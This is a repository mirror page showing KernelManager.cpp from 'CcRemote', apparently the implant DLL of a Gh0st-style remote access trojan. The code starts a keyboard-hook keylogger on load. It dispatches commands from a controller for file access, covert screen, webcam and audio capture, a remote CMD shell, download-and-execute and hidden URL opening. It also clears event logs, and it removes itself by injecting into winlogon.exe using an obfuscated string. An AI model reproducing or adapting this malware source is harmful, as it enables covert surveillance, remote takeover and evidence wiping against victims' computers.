GuanM/CcRemote
1
0
Fork 0
mirror of https://github.com/Cc28256/CcRemote.git synced 2025-06-08 05:19:50 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
CcRemote/CcMainDll/CcMainDll/common/KernelManager.cpp
Cc28257 00511401f8 strcry
2020-06-20 10:52:43 +08:00

168 lines
5.3 KiB
C++
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// KernelManager.cpp: implementation of the CKernelManager class.
//
//////////////////////////////////////////////////////////////////////
#include "..\pch.h"
#include "KernelManager.h"
#include "loop.h"
#include "until.h"
#include "inject.h"
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
char CKernelManager::m_strMasterHost[256] = {0};
UINT CKernelManager::m_nMasterPort = 80;
CKernelManager::CKernelManager(CClientSocket *pClient, LPCTSTR lpszServiceName, DWORD dwServiceType, LPCTSTR lpszKillEvent,
LPCTSTR lpszMasterHost, UINT nMasterPort) : CManager(pClient)
{
if (lpszServiceName != NULL)
{
lstrcpy(m_strServiceName, lpszServiceName);
}
if (lpszKillEvent != NULL)
lstrcpy(m_strKillEvent, lpszKillEvent);
if (lpszMasterHost != NULL)
lstrcpy(m_strMasterHost, lpszMasterHost);
m_nMasterPort = nMasterPort;
m_dwServiceType = dwServiceType;
m_nThreadCount = 0;
// 初次连接,控制端发送命令表始激活
m_bIsActived = false;
// 创建一个监视键盘记录的线程
// 键盘HOOK跟UNHOOK必须在同一个线程中
m_hThread[m_nThreadCount++] =
MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_HookKeyboard, NULL, 0, NULL, true);
}
CKernelManager::~CKernelManager()
{
for(int i = 0; i < m_nThreadCount; i++)
{
TerminateThread(m_hThread[i], -1);
CloseHandle(m_hThread[i]);
}
}
//---这里就处理主控端发送来的数据 每一种功能都有一个线程函数对应转到Loop_FileManager
// 加上激活
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
switch (lpBuffer[0])
{
case COMMAND_ACTIVED:
InterlockedExchange((LONG *)&m_bIsActived, true);
break;
case COMMAND_LIST_DRIVE: // 文件管理
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, false);
break;
case COMMAND_SCREEN_SPY: // 屏幕查看
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_WEBCAM: // 摄像头
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_AUDIO: // 录音机
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SHELL: // 远程shell-CMD
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager,
(LPVOID)m_pClient->m_Socket, 0, NULL, true);
break;
case COMMAND_KEYBOARD:
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_SYSTEM: // 进程
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_WSLIST: // 窗口
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_WindowManager,
(LPVOID)m_pClient->m_Socket, 0, NULL);
break;
case COMMAND_DOWN_EXEC: // 下载者
m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
(LPVOID)(lpBuffer + 1), 0, NULL, true);
Sleep(100); // 传递参数用
break;
case COMMAND_OPEN_URL_SHOW: // 显示打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
break;
case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
break;
case COMMAND_REMOVE: // 卸载,
UnInstallService();
break;
case COMMAND_CLEAN_EVENT: // 清除日志
CleanEvent();
break;
case COMMAND_SESSION:
CSystemManager::ShutdownWindows(lpBuffer[1]);
break;
case COMMAND_RENAME_REMARK: // 改备注
SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
break;
case COMMAND_UPDATE_SERVER: // 更新服务端
if (UpdateServer((char *)lpBuffer + 1))
UnInstallService();
break;
case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
break;
}
}
void CKernelManager::UnInstallService()
{
char strServiceDll[MAX_PATH];
char strRandomFile[MAX_PATH];
GetSystemDirectory(strServiceDll, sizeof(strServiceDll));
lstrcat(strServiceDll, "\\");
lstrcat(strServiceDll, m_strServiceName);
lstrcat(strServiceDll, "ex.dll");
// 装文件随机改名,重启时删除
wsprintf(strRandomFile, "%d.bak", GetTickCount());
MoveFile(strServiceDll, strRandomFile);
MoveFileEx(strRandomFile, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
// 删除离线记录文件
char strRecordFile[MAX_PATH];
GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
lstrcat(strRecordFile, "\\syslog.dat");
DeleteFile(strRecordFile);
char winlogon[] = { 0x0c,0xbc,0xa3,0xa7,0xa4,0xa8,0xa1,0xaa,0xaa,0xed,0xa7,0xb9,0xa5 }; //winlogon.exe
char* winlogon_exe = decodeStr(winlogon); //解密函数
if (m_dwServiceType != 0x120) // owner的远程删除不能自己停止自己删除,远程线程删除
{
InjectRemoveService(winlogon_exe, m_strServiceName);
}
else // shared进程的服务,可以删除自己
{
RemoveService(m_strServiceName);
}
// 所有操作完成后,通知主线程可以退出
CreateEvent(NULL, true, false, m_strKillEvent);
memset(winlogon_exe, 0, winlogon[STR_CRY_LENGTH]); //填充0
delete winlogon_exe;
}
bool CKernelManager::IsActived()
{
return m_bIsActived;
}
Reference in New Issue View Git Blame Copy Permalink